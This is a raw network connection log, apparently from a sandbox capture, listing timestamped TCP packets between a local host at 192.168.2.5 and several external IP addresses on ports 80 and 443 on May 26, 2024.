May 26, 2024 10:30:59.813266993 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.813283920 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.813297987 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.813329935 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.813344002 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.813361883 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.813393116 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.813409090 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.813425064 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.813457012 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.813469887 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.813488007 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.813504934 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.813534975 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.813568115 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.813601971 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.814155102 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.814188004 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.814219952 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.814235926 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.814250946 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.814282894 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.814300060 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.814320087 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.814352036 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.814388990 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.814390898 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.814423084 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.814438105 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.814455986 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.814502954 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.814515114 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.814905882 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.814939976 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.814955950 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.814971924 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815002918 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815017939 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.815035105 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815067053 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815080881 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.815099001 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815129995 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815159082 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.815161943 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815193892 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815217018 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.815226078 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815257072 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815284967 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.815289974 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815321922 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815337896 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.815354109 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815397024 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.815622091 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815839052 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815871000 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815890074 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.815905094 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815936089 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815960884 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.815968037 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.815999985 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.816018105 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.816032887 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.816065073 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.816097021 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.816097021 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.816128969 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.816147089 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.816159964 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.816190958 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.816205978 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.816221952 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.816252947 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.816268921 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.816286087 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.816397905 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.820039988 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820072889 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820102930 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820128918 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.820190907 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820224047 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820241928 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.820254087 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820285082 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820307016 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.820314884 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820353031 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.820362091 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820394039 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820425034 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820439100 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.820456982 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820487976 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820501089 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.820534945 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820565939 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820583105 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.820596933 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820627928 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820643902 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.820658922 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820693970 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820703030 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.820727110 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820758104 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820772886 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.820790052 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820821047 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820837021 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.820852995 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820884943 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820898056 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.820915937 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820947886 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.820962906 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.820979118 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821012020 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821023941 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.821042061 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821074009 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821089983 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.821104050 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821135044 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821144104 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.821168900 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821199894 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821228981 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.821233034 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821264982 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821278095 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.821296930 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821327925 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821341991 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.821358919 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821389914 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821408033 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.821419954 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821450949 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821465969 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.821481943 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821512938 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821527004 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.821546078 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821577072 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821594954 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.821608067 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821643114 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821655989 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.821674109 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821706057 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821717978 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.821741104 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821774006 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821800947 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.821805954 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821836948 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821868896 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.821871042 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821903944 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821921110 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.821935892 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821966887 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.821986914 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.821996927 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.822030067 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.822041988 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.822062969 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.822093964 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.822110891 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.822125912 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.822156906 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.822170973 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.822555065 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.822587967 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.822609901 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.822720051 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.822752953 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.822767973 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.822784901 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.822817087 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.822834969 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.822877884 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.822910070 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.822933912 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.822942019 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.822973967 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.822993040 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.823004961 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.823035955 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.823049068 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.823645115 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.823678017 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.823698997 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.823709011 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.823740959 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.823755026 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.823771954 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.823802948 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.823816061 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.823834896 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.823867083 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.823887110 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.823899031 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.823930979 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.823946953 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.823961973 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.824017048 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.824053049 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.824270010 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.824302912 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.824335098 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.824357986 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.824367046 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.824397087 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.824415922 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.824448109 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.824464083 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.824479103 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.824511051 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.824522972 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.824542046 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.824573040 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.824604034 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.824604034 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.824656010 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.824747086 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.825102091 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825134993 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825165987 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825179100 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.825197935 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825229883 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825244904 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.825278044 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825309992 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825329065 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.825340986 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825372934 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825386047 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.825404882 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825436115 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825448990 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.825468063 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825500011 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825530052 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.825598001 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825623989 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.825629950 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825643063 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.825661898 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825692892 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825705051 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.825726032 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825757027 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.825772047 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.826375961 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.826409101 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.826426029 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.826440096 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.826478004 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.826508999 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.826548100 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.826580048 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.826596975 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.826611996 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.826643944 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.826658010 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.826674938 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.826706886 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.826719999 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.826738119 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.826769114 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.826787949 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.826802969 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.826833963 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.826859951 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.827383995 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.831304073 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.831336975 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:30:59.831382036 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.884079933 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:30:59.967706919 CEST	49734	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:59.974133015 CEST	80	49734	190.187.52.42	192.168.2.5
May 26, 2024 10:30:59.974222898 CEST	49734	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:59.974334002 CEST	49734	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:59.974356890 CEST	49734	80	192.168.2.5	190.187.52.42
May 26, 2024 10:31:00.035254002 CEST	80	49734	190.187.52.42	192.168.2.5
May 26, 2024 10:31:00.087423086 CEST	80	49734	190.187.52.42	192.168.2.5
May 26, 2024 10:31:00.854186058 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:00.854229927 CEST	443	49735	23.67.133.187	192.168.2.5
May 26, 2024 10:31:00.854304075 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:00.865556002 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:00.865573883 CEST	443	49735	23.67.133.187	192.168.2.5
May 26, 2024 10:31:01.124967098 CEST	80	49729	185.235.137.54	192.168.2.5
May 26, 2024 10:31:01.125174046 CEST	49729	80	192.168.2.5	185.235.137.54
May 26, 2024 10:31:01.125243902 CEST	49729	80	192.168.2.5	185.235.137.54
May 26, 2024 10:31:01.133512020 CEST	80	49734	190.187.52.42	192.168.2.5
May 26, 2024 10:31:01.138278008 CEST	80	49734	190.187.52.42	192.168.2.5
May 26, 2024 10:31:01.138365984 CEST	49734	80	192.168.2.5	190.187.52.42
May 26, 2024 10:31:01.138400078 CEST	49734	80	192.168.2.5	190.187.52.42
May 26, 2024 10:31:01.143553019 CEST	80	49729	185.235.137.54	192.168.2.5
May 26, 2024 10:31:01.148771048 CEST	80	49734	190.187.52.42	192.168.2.5
May 26, 2024 10:31:01.260118008 CEST	49736	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:01.260200977 CEST	443	49736	188.114.96.3	192.168.2.5
May 26, 2024 10:31:01.260296106 CEST	49736	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:01.260559082 CEST	49736	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:01.260593891 CEST	443	49736	188.114.96.3	192.168.2.5
May 26, 2024 10:31:01.535561085 CEST	443	49735	23.67.133.187	192.168.2.5
May 26, 2024 10:31:01.535873890 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:01.581096888 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:01.581120014 CEST	443	49735	23.67.133.187	192.168.2.5
May 26, 2024 10:31:01.582010031 CEST	443	49735	23.67.133.187	192.168.2.5
May 26, 2024 10:31:01.582098007 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:01.584019899 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:01.626497984 CEST	443	49735	23.67.133.187	192.168.2.5
May 26, 2024 10:31:01.745855093 CEST	443	49736	188.114.96.3	192.168.2.5
May 26, 2024 10:31:01.745956898 CEST	49736	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:01.747142076 CEST	49736	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:01.747170925 CEST	443	49736	188.114.96.3	192.168.2.5
May 26, 2024 10:31:01.748125076 CEST	443	49736	188.114.96.3	192.168.2.5
May 26, 2024 10:31:01.749068022 CEST	49736	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:01.749134064 CEST	49736	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:01.749145985 CEST	443	49736	188.114.96.3	192.168.2.5
May 26, 2024 10:31:02.065628052 CEST	443	49735	23.67.133.187	192.168.2.5
May 26, 2024 10:31:02.065691948 CEST	443	49735	23.67.133.187	192.168.2.5
May 26, 2024 10:31:02.065735102 CEST	443	49735	23.67.133.187	192.168.2.5
May 26, 2024 10:31:02.065795898 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:02.065795898 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:02.065795898 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:02.065831900 CEST	443	49735	23.67.133.187	192.168.2.5
May 26, 2024 10:31:02.065886021 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:02.087759972 CEST	443	49736	188.114.96.3	192.168.2.5
May 26, 2024 10:31:02.088005066 CEST	443	49736	188.114.96.3	192.168.2.5
May 26, 2024 10:31:02.088072062 CEST	49736	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:02.092679977 CEST	49736	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:02.092710018 CEST	443	49736	188.114.96.3	192.168.2.5
May 26, 2024 10:31:02.132608891 CEST	443	49735	23.67.133.187	192.168.2.5
May 26, 2024 10:31:02.132658005 CEST	443	49735	23.67.133.187	192.168.2.5
May 26, 2024 10:31:02.132693052 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:02.132725954 CEST	443	49735	23.67.133.187	192.168.2.5
May 26, 2024 10:31:02.132742882 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:02.132771015 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:02.150016069 CEST	443	49735	23.67.133.187	192.168.2.5
May 26, 2024 10:31:02.150074005 CEST	443	49735	23.67.133.187	192.168.2.5
